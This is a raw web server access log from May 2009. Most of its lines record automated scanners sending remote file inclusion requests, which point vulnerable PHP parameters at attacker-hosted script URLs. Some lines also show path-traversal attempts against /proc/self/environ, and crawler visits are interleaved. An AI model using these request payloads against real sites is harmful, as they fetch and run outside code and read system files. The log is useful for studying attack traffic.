81.175.71.121 - - [13/May/2009:09:50:21 -0500] "GET /logs/access_log.1233705600///?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/fx29id2.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
81.175.71.121 - - [13/May/2009:09:50:21 -0500] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/fx29id2.txt??? HTTP/1.1" 200 3246 "-""Mozilla/5.0"
81.175.71.121 - - [13/May/2009:09:50:23 -0500] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/fx29id2.txt??? HTTP/1.1" 200 189196 "-""Mozilla/5.0"
81.175.71.121 - - [13/May/2009:09:50:33 -0500] "GET /logs/access_log.1233878400///?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/fx29id2.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
77.221.130.19 - - [13/May/2009:09:50:47 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
77.221.130.19 - - [13/May/2009:09:50:48 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
67.204.0.222 - - [13/May/2009:09:51:18 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.803"
67.204.0.222 - - [13/May/2009:09:51:18 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.803"
67.204.0.222 - - [13/May/2009:09:51:18 -0500] "GET //Neos_Chronos/header.php?base_folder=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.803"
67.204.0.222 - - [13/May/2009:09:51:18 -0500] "GET //Neos_Chronos/header.php?base_folder=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.803"
200.69.205.114 - - [13/May/2009:09:52:57 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kimstroy.by//assets/images/super-id.txt??? HTTP/1.1" 404 339 "-""libwww-perl/5.803"
200.69.205.114 - - [13/May/2009:09:52:57 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kimstroy.by//assets/images/super-id.txt??? HTTP/1.1" 404 334 "-""libwww-perl/5.803"
77.221.130.19 - - [13/May/2009:09:52:57 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.musicbeatz.co.uk/download/lib//RFI-SCAN.V2.ID.PRIVATE.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
77.221.130.19 - - [13/May/2009:09:52:58 -0500] "GET //Neos_Chronos/header.php?base_folder=http://www.musicbeatz.co.uk/download/lib//RFI-SCAN.V2.ID.PRIVATE.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
77.221.130.19 - - [13/May/2009:09:53:18 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
77.221.130.19 - - [13/May/2009:09:53:19 -0500] "GET //Neos_Chronos/header.php?base_folder=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
66.249.67.180 - - [13/May/2009:09:53:31 -0500] "GET /logs/access_log.1178323200 HTTP/1.1" 200 1120 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
221.139.1.251 - - [13/May/2009:09:53:39 -0500] "GET /logs/access_log.1240185600//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 361 "-""Mozilla/5.0"
221.139.1.251 - - [13/May/2009:09:53:39 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
221.139.1.251 - - [13/May/2009:09:53:39 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
221.139.1.251 - - [13/May/2009:09:53:48 -0500] "GET /logs/access_log.1239235200//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 361 "-""Mozilla/5.0"
85.92.68.111 - - [13/May/2009:09:54:22 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
85.92.68.111 - - [13/May/2009:09:54:22 -0500] "GET /logs/access_log.1240185600//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
85.92.68.111 - - [13/May/2009:09:54:22 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
85.92.68.111 - - [13/May/2009:09:54:29 -0500] "GET /logs/access_log.1239235200//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
66.225.211.159 - - [13/May/2009:09:56:14 -0500] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.ionthenet.co.kr/note_log/ec.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.820"
66.225.211.159 - - [13/May/2009:09:56:15 -0500] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.ionthenet.co.kr/note_log/ec.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.820"
202.89.33.167 - - [13/May/2009:09:58:31 -0500] "GET /logs//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.infoage.co.kr/upload/ec.txt? HTTP/1.1" 404 319 "-""libwww-perl/5.805"
202.89.33.167 - - [13/May/2009:09:58:32 -0500] "GET //modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.infoage.co.kr/upload/ec.txt? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
66.249.67.180 - - [13/May/2009:09:58:45 -0500] "GET /logs/access_log.1210291200 HTTP/1.1" 200 903 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
67.204.0.222 - - [13/May/2009:10:02:23 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.803"
67.204.0.222 - - [13/May/2009:10:02:26 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.803"
67.204.0.222 - - [13/May/2009:10:02:27 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.803"
67.204.0.222 - - [13/May/2009:10:02:28 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.803"
67.204.0.222 - - [13/May/2009:10:03:47 -0500] "GET /logs//guestbook1//admin.php?include_path=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 310 "-""libwww-perl/5.803"
67.204.0.222 - - [13/May/2009:10:03:47 -0500] "GET //guestbook1//admin.php?include_path=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.803"
67.204.0.222 - - [13/May/2009:10:03:53 -0500] "GET /logs//guestbook1//admin.php?include_path=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 310 "-""libwww-perl/5.803"
67.204.0.222 - - [13/May/2009:10:03:53 -0500] "GET //guestbook1//admin.php?include_path=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.803"
66.249.67.180 - - [13/May/2009:10:04:13 -0500] "GET /logs/access_log.1201219200 HTTP/1.1" 200 697 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
77.221.130.19 - - [13/May/2009:10:04:32 -0500] "GET /logs//guestbook1//admin.php?include_path=http://www.musicbeatz.co.uk/download/lib//RFI-SCAN.V2.ID.PRIVATE.txt?? HTTP/1.1" 404 310 "-""libwww-perl/5.805"
77.221.130.19 - - [13/May/2009:10:04:36 -0500] "GET //guestbook1//admin.php?include_path=http://www.musicbeatz.co.uk/download/lib//RFI-SCAN.V2.ID.PRIVATE.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
77.221.130.19 - - [13/May/2009:10:04:48 -0500] "GET /logs//guestbook1//admin.php?include_path=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 310 "-""libwww-perl/5.805"
77.221.130.19 - - [13/May/2009:10:04:49 -0500] "GET //guestbook1//admin.php?include_path=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
212.158.163.65 - - [13/May/2009:10:05:04 -0500] "GET /logs//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.infoage.co.kr/upload/ec.txt? HTTP/1.1" 404 319 "-""libwww-perl/5.805"
212.158.163.65 - - [13/May/2009:10:05:04 -0500] "GET //modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.infoage.co.kr/upload/ec.txt? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
212.158.163.65 - - [13/May/2009:10:05:12 -0500] "GET /logs//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.infoage.co.kr/upload/ec.txt? HTTP/1.1" 404 319 "-""libwww-perl/5.805"
212.158.163.65 - - [13/May/2009:10:05:13 -0500] "GET //modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.infoage.co.kr/upload/ec.txt? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
74.52.137.82 - - [13/May/2009:10:06:03 -0500] "GET /logs//citywriter/head.php?path=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 308 "-""Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)"
74.52.137.82 - - [13/May/2009:10:06:03 -0500] "GET //citywriter/head.php?path=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 303 "-""Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)"
74.52.137.82 - - [13/May/2009:10:06:03 -0500] "GET /logs/errors.php?error=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 298 "-""Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
74.52.137.82 - - [13/May/2009:10:06:03 -0500] "GET /errors.php?error=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 293 "-""Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
74.52.137.82 - - [13/May/2009:10:06:03 -0500] "GET /logs//citywriter/head.php?path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 308 "-""XXXXXX"
74.52.137.82 - - [13/May/2009:10:06:03 -0500] "GET //citywriter/head.php?path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 303 "-""XXXXXX"
74.52.137.82 - - [13/May/2009:10:06:03 -0500] "GET //citywriter/head.php?path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 303 "-""XXXXXX"
74.52.137.82 - - [13/May/2009:10:06:03 -0500] "GET /logs//citywriter/head.php?path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 308 "-""XXXXXX"
110.45.144.106 - - [13/May/2009:10:08:32 -0500] "GET /logs/access_log.1237680000//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 357 "-""Mozilla/5.0"
81.175.71.121 - - [13/May/2009:10:08:44 -0500] "GET /logs/access_log.1230249600///?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/fx29id2.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
81.175.71.121 - - [13/May/2009:10:08:44 -0500] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/fx29id2.txt??? HTTP/1.1" 200 3246 "-""Mozilla/5.0"
110.45.144.106 - - [13/May/2009:10:08:45 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
81.175.71.121 - - [13/May/2009:10:08:45 -0500] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/fx29id2.txt??? HTTP/1.1" 200 189196 "-""Mozilla/5.0"
66.249.67.180 - - [13/May/2009:10:09:25 -0500] "GET /logs/access_log.1171584000 HTTP/1.1" 200 6596 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
91.197.162.90 - - [13/May/2009:10:10:55 -0500] "GET /logs//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.ionthenet.co.kr/note_log/ec.txt? HTTP/1.1" 404 319 "-""libwww-perl/5.805"
91.197.162.90 - - [13/May/2009:10:10:55 -0500] "GET //modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.ionthenet.co.kr/note_log/ec.txt? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
66.249.67.180 - - [13/May/2009:10:14:37 -0500] "GET /logs/access_log.1187395200 HTTP/1.1" 200 3232 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
201.234.41.5 - - [13/May/2009:10:14:49 -0500] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 345 "-""libwww-perl/5.79"
201.234.41.5 - - [13/May/2009:10:14:49 -0500] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.gammarus.ru/prog/css/Roseid.txt? HTTP/1.1" 404 340 "-""libwww-perl/5.79"
200.69.205.114 - - [13/May/2009:10:17:33 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.kimstroy.by//assets/images/super-id.txt??? HTTP/1.1" 404 325 "-""libwww-perl/5.803"
200.69.205.114 - - [13/May/2009:10:17:34 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.kimstroy.by//assets/images/super-id.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.803"
65.55.208.143 - - [13/May/2009:10:19:25 -0500] "GET /logs/access_log.1119657600 HTTP/1.1" 200 293 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.143 - - [13/May/2009:10:19:27 -0500] "GET /logs/access_log.1140393600 HTTP/1.1" 200 460 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.143 - - [13/May/2009:10:19:28 -0500] "GET /logs/access_log.1147305600 HTTP/1.1" 200 843 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.143 - - [13/May/2009:10:19:31 -0500] "GET /logs/access_log.1158019200 HTTP/1.1" 200 553 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.143 - - [13/May/2009:10:19:36 -0500] "GET /logs/access_log.1191888000 HTTP/1.1" 200 3240 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.143 - - [13/May/2009:10:19:47 -0500] "GET /logs/access_log.1214524800 HTTP/1.1" 200 5140 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.143 - - [13/May/2009:10:19:56 -0500] "GET /logs/access_log.1106870400 HTTP/1.1" 200 130 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
66.249.67.180 - - [13/May/2009:10:20:00 -0500] "GET /logs/access_log.1106784000 HTTP/1.1" 200 7834 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
65.55.208.143 - - [13/May/2009:10:20:53 -0500] "GET /logs/access_log.1171065600 HTTP/1.1" 200 6820 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.143 - - [13/May/2009:10:20:58 -0500] "GET /logs/access_log.1215734400 HTTP/1.1" 200 1948 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.143 - - [13/May/2009:10:21:00 -0500] "GET /logs/access_log.1123891200 HTTP/1.1" 200 272 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.143 - - [13/May/2009:10:21:03 -0500] "GET /logs/access_log.1132617600 HTTP/1.1" 200 3269 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.143 - - [13/May/2009:10:21:05 -0500] "GET /logs/access_log.1138752000 HTTP/1.1" 200 333 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.143 - - [13/May/2009:10:23:24 -0500] "GET /logs/access_log.1165795200 HTTP/1.1" 200 656 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.143 - - [13/May/2009:10:23:24 -0500] "GET /logs/access_log.1191801600 HTTP/1.1" 200 8313 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
201.232.54.48 - - [13/May/2009:10:24:56 -0500] "GET /logs//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.infoage.co.kr/upload/ec.txt? HTTP/1.1" 404 319 "-""libwww-perl/5.805"
66.249.67.180 - - [13/May/2009:10:25:20 -0500] "GET /logs/access_log.1185494400 HTTP/1.1" 200 4011 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
91.202.4.158 - - [13/May/2009:10:27:35 -0500] "GET //?custompluginfile%5B%5D=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 200 3245 "-""XXXXXX"
91.202.4.158 - - [13/May/2009:10:27:35 -0500] "GET //?custompluginfile%5B%5D=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3245 "-""XXXXXX"
91.202.4.158 - - [13/May/2009:10:27:38 -0500] "GET /logs//?custompluginfile%5B%5D=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 200 189195 "-""XXXXXX"
91.202.4.158 - - [13/May/2009:10:27:43 -0500] "GET /logs//?custompluginfile%5B%5D=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 189195 "-""XXXXXX"
211.233.19.201 - - [13/May/2009:10:28:55 -0500] "GET /logs//components/com_virtuemart/_theme/breadcrumb.php?rootBase=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 336 "-""Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)"
211.233.19.201 - - [13/May/2009:10:28:56 -0500] "GET /logs/errors.php?error=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 298 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)"
211.233.19.201 - - [13/May/2009:10:28:57 -0500] "GET /logs//components/com_virtuemart/_theme/breadcrumb.php?rootBase=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 336 "-""XXXXXX"
211.233.19.201 - - [13/May/2009:10:28:58 -0500] "GET /logs//components/com_virtuemart/_theme/breadcrumb.php?rootBase=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 336 "-""XXXXXX"
211.233.19.201 - - [13/May/2009:10:29:01 -0500] "GET //components/com_virtuemart/_theme/breadcrumb.php?rootBase=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 331 "-""Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)"
211.233.19.201 - - [13/May/2009:10:29:05 -0500] "GET /errors.php?error=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 293 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)"
211.233.19.201 - - [13/May/2009:10:29:07 -0500] "GET //components/com_virtuemart/_theme/breadcrumb.php?rootBase=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 331 "-""XXXXXX"
211.233.19.201 - - [13/May/2009:10:29:16 -0500] "GET //components/com_virtuemart/_theme/breadcrumb.php?rootBase=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 331 "-""XXXXXX"
66.249.67.180 - - [13/May/2009:10:30:30 -0500] "GET /logs/access_log.1177977600 HTTP/1.1" 200 1536 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
202.89.33.167 - - [13/May/2009:10:30:37 -0500] "GET /logs//shop/index.php?_shop_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 303 "-""Mozilla/5.0"
202.89.33.167 - - [13/May/2009:10:30:37 -0500] "GET /logs/access_log.1238284800//shop/index.php?_shop_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
202.89.33.167 - - [13/May/2009:10:30:37 -0500] "GET //shop/index.php?_shop_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
202.89.33.167 - - [13/May/2009:10:30:37 -0500] "GET /logs/access_log.1232841600//shop/index.php?_shop_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
90.156.148.171 - - [13/May/2009:10:31:15 -0500] "GET //shop/index.php?_shop_path=http://www.ladyboss.com.ua/admin/fx29id2.txt??%20? HTTP/1.1" 404 298 "-""Mozilla/5.0"
90.156.148.171 - - [13/May/2009:10:31:15 -0500] "GET /logs//shop/index.php?_shop_path=http://www.ladyboss.com.ua/admin/fx29id2.txt??%20? HTTP/1.1" 404 303 "-""Mozilla/5.0"
90.156.148.171 - - [13/May/2009:10:31:15 -0500] "GET /logs/access_log.1238284800//shop/index.php?_shop_path=http://www.ladyboss.com.ua/admin/fx29id2.txt??%20? HTTP/1.1" 404 325 "-""Mozilla/5.0"
90.156.148.171 - - [13/May/2009:10:31:24 -0500] "GET /logs/access_log.1232841600//shop/index.php?_shop_path=http://www.ladyboss.com.ua/admin/fx29id2.txt??%20? HTTP/1.1" 404 325 "-""Mozilla/5.0"
72.32.210.206 - - [13/May/2009:10:32:00 -0500] "GET //shop/index.php?_shop_path=http://www.ladyboss.com.ua/admin/fx29id2.txt??%20? HTTP/1.1" 404 298 "-""Mozilla/5.0"
72.32.210.206 - - [13/May/2009:10:32:00 -0500] "GET /logs//shop/index.php?_shop_path=http://www.ladyboss.com.ua/admin/fx29id2.txt??%20? HTTP/1.1" 404 303 "-""Mozilla/5.0"
72.32.210.206 - - [13/May/2009:10:32:00 -0500] "GET /logs/access_log.1238284800//shop/index.php?_shop_path=http://www.ladyboss.com.ua/admin/fx29id2.txt??%20? HTTP/1.1" 404 325 "-""Mozilla/5.0"
72.32.210.206 - - [13/May/2009:10:32:00 -0500] "GET /logs/access_log.1232841600//shop/index.php?_shop_path=http://www.ladyboss.com.ua/admin/fx29id2.txt??%20? HTTP/1.1" 404 325 "-""Mozilla/5.0"
72.32.210.206 - - [13/May/2009:10:32:10 -0500] "GET //shop/index.php?_shop_path=http://www.ladyboss.com.ua/admin/fx29id2.txt??%20? HTTP/1.1" 404 298 "-""Mozilla/5.0"
72.32.210.206 - - [13/May/2009:10:32:10 -0500] "GET /logs/access_log.1238284800//shop/index.php?_shop_path=http://www.ladyboss.com.ua/admin/fx29id2.txt??%20? HTTP/1.1" 404 325 "-""Mozilla/5.0"
72.32.210.206 - - [13/May/2009:10:32:10 -0500] "GET /logs//shop/index.php?_shop_path=http://www.ladyboss.com.ua/admin/fx29id2.txt??%20? HTTP/1.1" 404 303 "-""Mozilla/5.0"
72.32.210.206 - - [13/May/2009:10:32:10 -0500] "GET /logs/access_log.1232841600//shop/index.php?_shop_path=http://www.ladyboss.com.ua/admin/fx29id2.txt??%20? HTTP/1.1" 404 325 "-""Mozilla/5.0"
94.102.51.196 - - [13/May/2009:10:34:26 -0500] "GET /logs/access_log.1232064000 HTTP/1.0" 200 120936 "http://fortpit.pconline.com/logs/access_log.1232064000""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
212.150.52.114 - - [13/May/2009:10:34:34 -0500] "GET /logs//shop/index.php?_shop_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
212.150.52.114 - - [13/May/2009:10:34:34 -0500] "GET /logs/access_log.1238284800//shop/index.php?_shop_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
212.150.52.114 - - [13/May/2009:10:34:34 -0500] "GET /logs/access_log.1232841600//shop/index.php?_shop_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
212.150.52.114 - - [13/May/2009:10:34:34 -0500] "GET //shop/index.php?_shop_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
212.150.52.114 - - [13/May/2009:10:34:35 -0500] "GET //shop/index.php?_shop_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
212.150.52.114 - - [13/May/2009:10:34:35 -0500] "GET /logs//shop/index.php?_shop_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
212.150.52.114 - - [13/May/2009:10:34:35 -0500] "GET /logs/access_log.1238284800//shop/index.php?_shop_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
212.150.52.114 - - [13/May/2009:10:34:35 -0500] "GET /logs/access_log.1232841600//shop/index.php?_shop_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
212.150.52.114 - - [13/May/2009:10:34:35 -0500] "GET //shop/index.php?_shop_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
212.150.52.114 - - [13/May/2009:10:34:35 -0500] "GET /logs//shop/index.php?_shop_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
212.150.52.114 - - [13/May/2009:10:34:35 -0500] "GET /logs/access_log.1238284800//shop/index.php?_shop_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
